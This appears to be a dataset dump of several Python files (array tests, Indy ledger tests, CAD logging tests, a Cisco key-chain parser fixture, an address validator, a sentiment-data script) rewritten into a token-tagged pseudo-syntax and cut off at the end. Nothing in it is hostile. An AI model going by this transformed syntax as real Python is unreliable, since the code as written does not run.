content stringlengths 0 1.55M |
|---|
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>numpy<as>np<import_from_stmt>test_tools.generators mk_seq_array<import_stmt>cunumeric<as>num<import_from_stmt>legate.core LEGATE_MAX_DIM<def_stmt>test <block_start>choices1=[[0 1 2 3] [10 11 12 13] [20 21 22 23] [30 31 32 33] ]<line_sep>a1=[2 3 1 0]<line_sep>num_a1=num.array(a1)<line_sep>num_choices1=num.array(choices1)<line_sep>aout=np.array([2.3 3.0 1.2 0.3])<line_sep>num_aout=num.array(aout)<assert_stmt>np.array_equal(np.choose(a1 choices1 out=aout) num.choose(num_a1 num_choices1 out=num_aout) )<assert_stmt>np.array_equal(aout num_aout)<line_sep>b=[2 4 1 0]<line_sep>num_b=num.array(b)<assert_stmt>np.array_equal(np.choose(b choices1 mode="clip") num.choose(num_b num_choices1 mode="clip") )<assert_stmt>np.array_equal(np.choose(b choices1 mode="wrap") num.choose(num_b num_choices1 mode="wrap") )<line_sep>a2=[[1 0 1] [0 1 0] [1 0 1]]<line_sep>choices2=[-10 10]<line_sep>num_a2=num.array(a2)<line_sep>num_choices2=num.array(choices2)<assert_stmt>np.array_equal(num.choose(num_a2 num_choices2) np.choose(a2 choices2))<line_sep>a3=np.array([0 1]).reshape((2 1 1))<line_sep>c1=np.array([1 2 3]).reshape((1 3 1))<line_sep>c2=np.array([-1 -2 -3 -4 -5]).reshape((1 1 5))<line_sep>num_a3=num.array(a3)<line_sep>num_c1=num.array(c1)<line_sep>num_c2=num.array(c2)<assert_stmt>np.array_equal(np.choose(a3 (c1 c2)) num.choose(num_a3 (num_c1 num_c2)))<for_stmt>ndim range(1 LEGATE_MAX_DIM+1)<block_start>tgt_shape=(5 )<times>ndim<line_sep># try various shapes that broadcast to the target shape
shapes=[tgt_shape]<for_stmt>d range(len(tgt_shape))<block_start>sh=list(tgt_shape)<line_sep>sh[d]=1<line_sep>shapes.append(tuple(sh))<block_end><for_stmt>choices_shape shapes# make sure the choices are between 0 and 1
<block_start>np_choices=mk_seq_array(np choices_shape)%2<line_sep>num_choices=mk_seq_array(num choices_shape)%2<for_stmt>rhs1_shape shapes<block_start>np_rhs1=np.full(rhs1_shape 42)<line_sep>num_rhs1=num.full(rhs1_shape 42)<for_stmt>rhs2_shape shapes# make sure rhs1 and rhs2 have different values
<block_start>np_rhs2=np.full(rhs2_shape 17)<line_sep>num_rhs2=num.full(rhs2_shape 17)<line_sep>np_res=np.choose(np_choices (np_rhs1 np_rhs2))<line_sep>num_res=num.choose(num_choices (num_rhs1 num_rhs2))<assert_stmt>np.array_equal(np_res num_res)<block_end><block_end><block_end><block_end><return><block_end><if_stmt>__name__<eq>"__main__"<block_start>test()<block_end> |
<import_stmt>json<import_stmt>pytest<import_from_stmt>indy ledger error<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_raw_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>raw='{"endpoint":{"ha":"127.0.0.1:5555"}}'<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "raw":raw}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination <none> raw <none>))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_hash_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>xhash="83d907821df1c87db829e96569a11f6fc2e7880acba5e43d07ab786959e13bd3"<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "hash":xhash}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination xhash <none> <none>))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_enc_value <block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<line_sep>enc="aa3f41f619aa7e5e6b6d0de555e05331787f9bf9aa672b94b57ab65b9b66c3ea960b18a98e3834b1fc6cebf49f463b81fd6e3181"<line_sep>expected_response={"identifier":identifier "operation":{"type":"100" "dest":destination "enc":enc}}<line_sep>response=json.loads(<await>ledger.build_attrib_request(identifier destination <none> <none> enc))<assert_stmt>expected_response.items()<le>response.items()<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_build_attrib_request_works_for_missed_attribute 
<block_start>identifier="Th7MpTaRZVRYnPiabds81Y"<line_sep>destination="Th7MpTaRZVRYnPiabds81Y"<with_stmt>pytest.raises(error.CommonInvalidStructure)<block_start><await>ledger.build_attrib_request(identifier destination <none> <none> <none>)<block_end><block_end> |
<import_stmt>warnings<import_from_stmt>typing Tuple Callable Any List<import_stmt>numpy<as>np<import_from_stmt>nebullvm.base QuantizationType<import_from_stmt>nebullvm.inference_learners.base BaseInferenceLearner<import_from_stmt>nebullvm.measure compute_relative_difference<def_stmt>check_precision optimized_learner:BaseInferenceLearner input_data:List[Tuple[Any <ellipsis>]] base_outputs_list:List[Tuple[Any <ellipsis>]] perf_loss_ths:float metric_func:Callable=<none> ys:List=<none> aggregation_func:Callable=np.mean <arrow>bool<block_start>metric_func=metric_func<or>compute_relative_difference<line_sep>relative_differences=[]<if_stmt>ys<is><none><block_start>ys=[<none>]<times>len(input_data)<block_end><for_stmt>inputs,base_outputs,y zip(input_data base_outputs_list ys)<block_start>opt_outputs=optimized_learner(*inputs)<line_sep>relative_difference=max(metric_func(base_output opt_output y)<for>base_output,opt_output zip(base_outputs opt_outputs))<line_sep>relative_differences.append(relative_difference)<block_end>relative_difference=aggregation_func(relative_differences)<line_sep><return>relative_difference<le>perf_loss_ths<block_end><def_stmt>check_quantization quantization_type:QuantizationType perf_loss_ths:float<block_start><if_stmt>quantization_type<is><none><and>perf_loss_ths<is><not><none><block_start><raise>ValueError("When a quantization threshold is given it is necessary to "<concat>"specify the quantization algorithm too.")<block_end><if_stmt>quantization_type<is><not><none><and>perf_loss_ths<is><none><block_start>warnings.warn("Got a valid quantization type without any given quantization "<concat>"threshold. The quantization step will be ignored.")<block_end><block_end> |
<import_stmt>unittest<import_stmt>mock<import_from_stmt>copy copy<import_from_stmt>tests BaseTest<import_stmt>logging<line_sep># Units under test
<import_stmt>cadquery<import_from_stmt>cadquery.freecad_impl console_logging<class_stmt>TestLogging(BaseTest)<block_start><def_stmt>setUp self# save root logger's state
<block_start>root_logger=logging.getLogger()<line_sep>self._initial_level=root_logger.level<line_sep>self._initial_logging_handlers=copy(root_logger.handlers)<block_end><def_stmt>tearDown self# forcefully re-establish original log state
<block_start>root_logger=logging.getLogger()<line_sep>root_logger.level=self._initial_level<line_sep>root_logger.handlers=self._initial_logging_handlers<line_sep># reset console_logging's global state
cadquery.freecad_impl.console_logging._logging_handler=<none><block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleMessage self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.info('foo')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('foo\n')<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleWarning self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.warning('bar')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_called_once_with('bar\n')<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleError self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.error('roo')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_called_once_with('roo\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleDebugOffDefault self mock_freecad<block_start>console_logging.enable()<line_sep>log=logging.getLogger('test')<line_sep>log.debug('no show')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_not_called()<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleSetLevelDebug self mock_freecad<block_start>console_logging.enable(level=logging.DEBUG)<line_sep>log=logging.getLogger('test')<line_sep>log.debug('now 
showing')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('now showing\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleSetLevelWarning self mock_freecad<block_start>console_logging.enable(level=logging.WARNING)<line_sep>log=logging.getLogger('test')<line_sep>log.info('no show')<line_sep>log.warning('be warned')<line_sep>mock_freecad.Console.PrintMessage.assert_not_called()<line_sep>mock_freecad.Console.PrintWarning.assert_called_once_with('be warned\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleLogFormat self mock_freecad<block_start>console_logging.enable(format=">> %(message)s <<")<line_sep>log=logging.getLogger('test')<line_sep>log.info('behold brackets!')<line_sep>mock_freecad.Console.PrintMessage.assert_called_once_with('>> behold brackets! <<\n')<block_end>@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')<def_stmt>testConsoleEnableDisable self mock_freecad<block_start>console_logging.enable()<line_sep>console_logging.disable()<line_sep>log=logging.getLogger('test')<line_sep>log.error('nope, disabled')<line_sep>mock_freecad.Console.PrintError.assert_not_called()<block_end><block_end> |
print(-1)<line_sep>print(-0)<line_sep>print(-(6))<line_sep>print(-(12<times>2))<line_sep>print(--10)<line_sep> |
expected_output={"key_chains":{"bla":{"keys":{1:{"accept_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } "key_string":"cisco123" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } 2:{"accept_lifetime":{"end":"06:01:00 UTC Jan 1 2010" "is_valid":<false> "start":"10:10:10 UTC Jan 1 2002" } "key_string":"blabla" "send_lifetime":{"end":"06:01:00 UTC Jan 1 2010" "is_valid":<false> "start":"10:10:10 UTC Jan 1 2002" } } } } "cisco":{"keys":{1:{"accept_lifetime":{"end":"infinite" "is_valid":<true> "start":"11:11:11 UTC Mar 1 2001" } "key_string":"cisco123" "send_lifetime":{"end":"infinite" "is_valid":<true> "start":"11:11:11 UTC Mar 1 2001" } } 2:{"accept_lifetime":{"end":"22:11:11 UTC Dec 20 2030" "is_valid":<true> "start":"11:22:11 UTC Jan 1 2001" } "key_string":"cisco234" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } 3:{"accept_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } "key_string":"cisco" "send_lifetime":{"end":"always valid" "is_valid":<true> "start":"always valid" } } } } } }<line_sep> |
# Generated by Django 1.10.7 on 2017-07-11 12:26
<import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('phonelog' '0012_server_date_not_null') ]<line_sep>operations=[migrations.DeleteModel(name='OldDeviceReportEntry' ) ]<block_end> |
<import_from_future_stmt> unicode_literals<import_stmt>io<import_stmt>json<import_stmt>os<import_stmt>re<import_from_stmt>collections OrderedDict<line_sep>VALID_COUNTRY_CODE=re.compile(r"^\w{2,3}$")<line_sep>VALIDATION_DATA_DIR=os.path.join(os.path.dirname(__file__) "data")<line_sep>VALIDATION_DATA_PATH=os.path.join(VALIDATION_DATA_DIR "%s.json")<line_sep>FIELD_MAPPING={"A":"street_address" "C":"city" "D":"city_area" "N":"name" "O":"company_name" "S":"country_area" "X":"sorting_code" "Z":"postal_code" }<line_sep>KNOWN_FIELDS=set(FIELD_MAPPING.values())|{"country_code"}<def_stmt>load_validation_data country_code="all"<block_start><if_stmt><not>VALID_COUNTRY_CODE.match(country_code)<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end>country_code=country_code.lower()<try_stmt># VALIDATION_DATA_PATH may have '%' symbols
# for backwards compatability if VALIDATION_DATA_PATH is imported
# by consumers of this package.
<block_start>path=VALIDATION_DATA_PATH%(country_code )<block_end><except_stmt>TypeError<block_start>path=os.path.join(VALIDATION_DATA_DIR "%s.json"%country_code)<block_end><if_stmt><not>os.path.exists(path)<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end><with_stmt>io.open(path encoding="utf-8")<as>data<block_start><return>json.load(data)<block_end><block_end><class_stmt>ValidationRules(object)<block_start>__slots__=["country_code" "country_name" "address_format" "address_latin_format" "allowed_fields" "required_fields" "upper_fields" "country_area_type" "country_area_choices" "city_type" "city_choices" "city_area_type" "city_area_choices" "postal_code_type" "postal_code_matchers" "postal_code_examples" "postal_code_prefix" ]<def_stmt>__init__ self country_code country_name address_format address_latin_format allowed_fields required_fields upper_fields country_area_type country_area_choices city_type city_choices city_area_type city_area_choices postal_code_type postal_code_matchers postal_code_examples postal_code_prefix <block_start>self.country_code=country_code<line_sep>self.country_name=country_name<line_sep>self.address_format=address_format<line_sep>self.address_latin_format=address_latin_format<line_sep>self.allowed_fields=allowed_fields<line_sep>self.required_fields=required_fields<line_sep>self.upper_fields=upper_fields<line_sep>self.country_area_type=country_area_type<line_sep>self.country_area_choices=country_area_choices<line_sep>self.city_type=city_type<line_sep>self.city_choices=city_choices<line_sep>self.city_area_type=city_area_type<line_sep>self.city_area_choices=city_area_choices<line_sep>self.postal_code_type=postal_code_type<line_sep>self.postal_code_matchers=postal_code_matchers<line_sep>self.postal_code_examples=postal_code_examples<line_sep>self.postal_code_prefix=postal_code_prefix<block_end><def_stmt>__repr__ self<block_start><return>("ValidationRules("<concat>"country_code=%r, 
"<concat>"country_name=%r, "<concat>"address_format=%r, "<concat>"address_latin_format=%r, "<concat>"allowed_fields=%r, "<concat>"required_fields=%r, "<concat>"upper_fields=%r, "<concat>"country_area_type=%r, "<concat>"country_area_choices=%r, "<concat>"city_type=%r, "<concat>"city_choices=%r, "<concat>"city_area_type=%r, "<concat>"city_area_choices=%r, "<concat>"postal_code_type=%r, "<concat>"postal_code_matchers=%r, "<concat>"postal_code_examples=%r, "<concat>"postal_code_prefix=%r)"%(self.country_code self.country_name self.address_format self.address_latin_format self.allowed_fields self.required_fields self.upper_fields self.country_area_type self.country_area_choices self.city_type self.city_choices self.city_area_type self.city_area_choices self.postal_code_type self.postal_code_matchers self.postal_code_examples self.postal_code_prefix ))<block_end><block_end><def_stmt>_make_choices rules translated=<false><block_start>sub_keys=rules.get("sub_keys")<if_stmt><not>sub_keys<block_start><return>[]<block_end>choices=[]<line_sep>sub_keys=sub_keys.split("~")<line_sep>sub_names=rules.get("sub_names")<if_stmt>sub_names<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_names.split("~"))<if>value]<block_end><else_stmt><block_start><if_stmt><not>translated<block_start>choices<augadd>[(key key)<for>key sub_keys]<block_end><block_end><if_stmt><not>translated<block_start>sub_lnames=rules.get("sub_lnames")<if_stmt>sub_lnames<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_lnames.split("~"))<if>value]<block_end>sub_lfnames=rules.get("sub_lfnames")<if_stmt>sub_lfnames<block_start>choices<augadd>[(key value)<for>key,value zip(sub_keys sub_lfnames.split("~"))<if>value]<block_end><block_end><return>choices<block_end><def_stmt>_compact_choices choices<block_start>value_map=OrderedDict()<for_stmt>key,value 
choices<block_start><if_stmt><not>key<in>value_map<block_start>value_map[key]=set()<block_end>value_map[key].add(value)<block_end><return>[(key value)<for>key,values value_map.items()<for>value sorted(values)]<block_end><def_stmt>_match_choices value choices<block_start><if_stmt>value<block_start>value=value.strip().lower()<block_end><for_stmt>name,label choices<block_start><if_stmt>name.lower()<eq>value<block_start><return>name<block_end><if_stmt>label.lower()<eq>value<block_start><return>name<block_end><block_end><block_end><def_stmt>_load_country_data country_code<block_start>database=load_validation_data("zz")<line_sep>country_data=database["ZZ"]<if_stmt>country_code<block_start>country_code=country_code.upper()<if_stmt>country_code.lower()<eq>"zz"<block_start><raise>ValueError("%r is not a valid country code"%(country_code ))<block_end>database=load_validation_data(country_code.lower())<line_sep>country_data.update(database[country_code])<block_end><return>country_data database<block_end><def_stmt>get_validation_rules address<block_start>country_code=address.get("country_code" "").upper()<line_sep>country_data,database=_load_country_data(country_code)<line_sep>country_name=country_data.get("name" "")<line_sep>address_format=country_data["fmt"]<line_sep>address_latin_format=country_data.get("lfmt" address_format)<line_sep>format_fields=re.finditer(r"%([ACDNOSXZ])" address_format)<line_sep>allowed_fields={FIELD_MAPPING[m.group(1)]<for>m format_fields}<line_sep>required_fields={FIELD_MAPPING[f]<for>f country_data["require"]}<line_sep>upper_fields={FIELD_MAPPING[f]<for>f 
country_data["upper"]}<line_sep>languages=[<none>]<if_stmt>"languages"<in>country_data<block_start>languages=country_data["languages"].split("~")<block_end>postal_code_matchers=[]<if_stmt>"postal_code"<in>allowed_fields<block_start><if_stmt>"zip"<in>country_data<block_start>postal_code_matchers.append(re.compile("^"+country_data["zip"]+"$"))<block_end><block_end>postal_code_examples=[]<if_stmt>"zipex"<in>country_data<block_start>postal_code_examples=country_data["zipex"].split(",")<block_end>country_area_choices=[]<line_sep>city_choices=[]<line_sep>city_area_choices=[]<line_sep>country_area_type=country_data["state_name_type"]<line_sep>city_type=country_data["locality_name_type"]<line_sep>city_area_type=country_data["sublocality_name_type"]<line_sep>postal_code_type=country_data["zip_name_type"]<line_sep>postal_code_prefix=country_data.get("postprefix" "")<line_sep># second level of data is for administrative areas
country_area=<none><line_sep>city=<none><line_sep>city_area=<none><if_stmt>country_code<in>database<block_start><if_stmt>"sub_keys"<in>country_data<block_start><for_stmt>language languages<block_start>is_default_language=(language<is><none><or>language<eq>country_data["lang"])<line_sep>matched_country_area=<none><line_sep>matched_city=<none><if_stmt>is_default_language<block_start>localized_country_data=database[country_code]<block_end><else_stmt><block_start>localized_country_data=database["%s--%s"%(country_code language)]<block_end>localized_country_area_choices=_make_choices(localized_country_data)<line_sep>country_area_choices<augadd>localized_country_area_choices<line_sep>existing_choice=country_area<is><not><none><line_sep>matched_country_area=country_area=_match_choices(address.get("country_area") localized_country_area_choices)<if_stmt>matched_country_area# third level of data is for cities
<block_start><if_stmt>is_default_language<block_start>country_area_data=database["%s/%s"%(country_code country_area)]<block_end><else_stmt><block_start>country_area_data=database["%s/%s--%s"%(country_code country_area language)]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>country_area_data<block_start>postal_code_matchers.append(re.compile("^"+country_area_data["zip"]))<block_end><if_stmt>"zipex"<in>country_area_data<block_start>postal_code_examples=country_area_data["zipex"].split(",")<block_end><block_end><if_stmt>"sub_keys"<in>country_area_data<block_start>localized_city_choices=_make_choices(country_area_data)<line_sep>city_choices<augadd>localized_city_choices<line_sep>existing_choice=city<is><not><none><line_sep>matched_city=city=_match_choices(address.get("city") localized_city_choices)<block_end><if_stmt>matched_city# fourth level of data is for dependent sublocalities
<block_start><if_stmt>is_default_language<block_start>city_data=database["%s/%s/%s"%(country_code country_area city)]<block_end><else_stmt><block_start>city_data=database["%s/%s/%s--%s"%(country_code country_area city language)]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>city_data<block_start>postal_code_matchers.append(re.compile("^"+city_data["zip"]))<block_end><if_stmt>"zipex"<in>city_data<block_start>postal_code_examples=city_data["zipex"].split(",")<block_end><block_end><if_stmt>"sub_keys"<in>city_data<block_start>localized_city_area_choices=_make_choices(city_data)<line_sep>city_area_choices<augadd>localized_city_area_choices<line_sep>existing_choice=city_area<is><not><none><line_sep>matched_city_area=city_area=_match_choices(address.get("city_area") localized_city_area_choices)<if_stmt>matched_city_area<block_start><if_stmt>is_default_language<block_start>city_area_data=database["%s/%s/%s/%s"%(country_code country_area city city_area)]<block_end><else_stmt><block_start>city_area_data=database["%s/%s/%s/%s--%s"%(country_code country_area city city_area language )]<block_end><if_stmt><not>existing_choice<block_start><if_stmt>"zip"<in>city_area_data<block_start>postal_code_matchers.append(re.compile("^"+city_area_data["zip"]))<block_end><if_stmt>"zipex"<in>city_area_data<block_start>postal_code_examples=city_area_data["zipex"].split(",")<block_end><block_end><block_end><block_end><block_end><block_end><block_end><block_end>country_area_choices=_compact_choices(country_area_choices)<line_sep>city_choices=_compact_choices(city_choices)<line_sep>city_area_choices=_compact_choices(city_area_choices)<block_end><return>ValidationRules(country_code country_name address_format address_latin_format allowed_fields required_fields upper_fields country_area_type country_area_choices city_type city_choices city_area_type city_area_choices postal_code_type postal_code_matchers postal_code_examples postal_code_prefix 
)<block_end><class_stmt>InvalidAddress(ValueError)<block_start><def_stmt>__init__ self message errors<block_start>super(InvalidAddress self).__init__(message)<line_sep>self.errors=errors<block_end><block_end><def_stmt>_normalize_field name rules data choices errors<block_start>value=data.get(name)<if_stmt>name<in>rules.upper_fields<and>value<is><not><none><block_start>value=value.upper()<line_sep>data[name]=value<block_end><if_stmt>name<not><in>rules.allowed_fields<block_start>data[name]=""<block_end><elif_stmt><not>value<and>name<in>rules.required_fields<block_start>errors[name]="required"<block_end><elif_stmt>choices<block_start><if_stmt>value<or>name<in>rules.required_fields<block_start>value=_match_choices(value choices)<if_stmt>value<is><not><none><block_start>data[name]=value<block_end><else_stmt><block_start>errors[name]="invalid"<block_end><block_end><block_end><if_stmt><not>value<block_start>data[name]=""<block_end><block_end><def_stmt>normalize_address address<block_start>errors={}<try_stmt><block_start>rules=get_validation_rules(address)<block_end><except_stmt>ValueError<block_start>errors["country_code"]="invalid"<block_end><else_stmt><block_start>cleaned_data=address.copy()<line_sep>country_code=cleaned_data.get("country_code")<if_stmt><not>country_code<block_start>errors["country_code"]="required"<block_end><else_stmt><block_start>cleaned_data["country_code"]=country_code.upper()<block_end>_normalize_field("country_area" rules cleaned_data rules.country_area_choices errors)<line_sep>_normalize_field("city" rules cleaned_data rules.city_choices errors)<line_sep>_normalize_field("city_area" rules cleaned_data rules.city_area_choices errors)<line_sep>_normalize_field("postal_code" rules cleaned_data [] errors)<line_sep>postal_code=cleaned_data.get("postal_code" "")<if_stmt>rules.postal_code_matchers<and>postal_code<block_start><for_stmt>matcher 
rules.postal_code_matchers<block_start><if_stmt><not>matcher.match(postal_code)<block_start>errors["postal_code"]="invalid"<line_sep><break><block_end><block_end><block_end>_normalize_field("street_address" rules cleaned_data [] errors)<line_sep>_normalize_field("sorting_code" rules cleaned_data [] errors)<block_end><if_stmt>errors<block_start><raise>InvalidAddress("Invalid address" errors)<block_end><return>cleaned_data<block_end><def_stmt>_format_address_line line_format address rules<block_start><def_stmt>_get_field name<block_start>value=address.get(name "")<if_stmt>name<in>rules.upper_fields<block_start>value=value.upper()<block_end><return>value<block_end>replacements={"%%%s"%code:_get_field(field_name)<for>code,field_name FIELD_MAPPING.items()}<line_sep>fields=re.split("(%.)" line_format)<line_sep>fields=[replacements.get(f f)<for>f fields]<line_sep><return>"".join(fields).strip()<block_end><def_stmt>get_field_order address latin=<false><block_start>"""
Returns expected order of address form fields as a list of lists.
Example for PL:
>>> get_field_order({'country_code': 'PL'})
[[u'name'], [u'company_name'], [u'street_address'], [u'postal_code', u'city']]
"""<line_sep>rules=get_validation_rules(address)<line_sep>address_format=rules.address_latin_format<if>latin<else>rules.address_format<line_sep>address_lines=address_format.split("%n")<line_sep>replacements={"%%%s"%code:field_name<for>code,field_name FIELD_MAPPING.items()}<line_sep>all_lines=[]<for_stmt>line address_lines<block_start>fields=re.split("(%.)" line)<line_sep>single_line=[replacements.get(field)<for>field fields]<line_sep>single_line=list(filter(<none> single_line))<line_sep>all_lines.append(single_line)<block_end><return>all_lines<block_end><def_stmt>format_address address latin=<false><block_start>rules=get_validation_rules(address)<line_sep>address_format=rules.address_latin_format<if>latin<else>rules.address_format<line_sep>address_line_formats=address_format.split("%n")<line_sep>address_lines=[_format_address_line(lf address rules)<for>lf address_line_formats]<line_sep>address_lines.append(rules.country_name)<line_sep>address_lines=filter(<none> address_lines)<line_sep><return>"\n".join(address_lines)<block_end><def_stmt>latinize_address address normalized=<false><block_start><if_stmt><not>normalized<block_start>address=normalize_address(address)<block_end>cleaned_data=address.copy()<line_sep>country_code=address.get("country_code" "").upper()<line_sep>dummy_country_data,database=_load_country_data(country_code)<if_stmt>country_code<block_start>country_area=address["country_area"]<if_stmt>country_area<block_start>key="%s/%s"%(country_code country_area)<line_sep>country_area_data=database.get(key)<if_stmt>country_area_data<block_start>cleaned_data["country_area"]=country_area_data.get("lname" country_area_data.get("name" country_area))<line_sep>city=address["city"]<line_sep>key="%s/%s/%s"%(country_code country_area city)<line_sep>city_data=database.get(key)<if_stmt>city_data<block_start>cleaned_data["city"]=city_data.get("lname" city_data.get("name" city))<line_sep>city_area=address["city_area"]<line_sep>key="%s/%s/%s/%s"%(country_code country_area 
city city_area)<line_sep>city_area_data=database.get(key)<if_stmt>city_area_data<block_start>cleaned_data["city_area"]=city_area_data.get("lname" city_area_data.get("name" city_area))<block_end><block_end><block_end><block_end><block_end><return>cleaned_data<block_end> |
<import_stmt>os<import_from_stmt>data_utils_sentihood *<line_sep>data_dir='../data/sentihood/'<line_sep>aspect2idx={'general':0 'price':1 'transit-location':2 'safety':3 }<line_sep>(train train_aspect_idx),(val val_aspect_idx),(test test_aspect_idx)=load_task(data_dir aspect2idx)<line_sep>print("len(train) = " len(train))<line_sep>print("len(val) = " len(val))<line_sep>print("len(test) = " len(test))<line_sep>train.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>val.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>test.sort(key=<lambda>x:x[2]+str(x[0])+x[3][0])<line_sep>dir_path=data_dir+'bert-pair/'<if_stmt><not>os.path.exists(dir_path)<block_start>os.makedirs(dir_path)<block_end><with_stmt>open(dir_path+"train_NLI_M.tsv" "w" encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v train<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end><with_stmt>open(dir_path+"dev_NLI_M.tsv" "w" 
encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v val<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end><with_stmt>open(dir_path+"test_NLI_M.tsv" "w" encoding="utf-8")<as>f<block_start>f.write("id\tsentence1\tsentence2\tlabel\n")<for_stmt>v test<block_start>f.write(str(v[0])+"\t")<line_sep>word=v[1][0].lower()<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' "+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><for_stmt>i range(1 len(v[1]))<block_start>word=v[1][i].lower()<line_sep>f.write(" ")<if_stmt>word<eq>'location1'<block_start>f.write('location - 1')<block_end><elif_stmt>word<eq>'location2'<block_start>f.write('location - 2')<block_end><elif_stmt>word[0]<eq>'\''<block_start>f.write("\' 
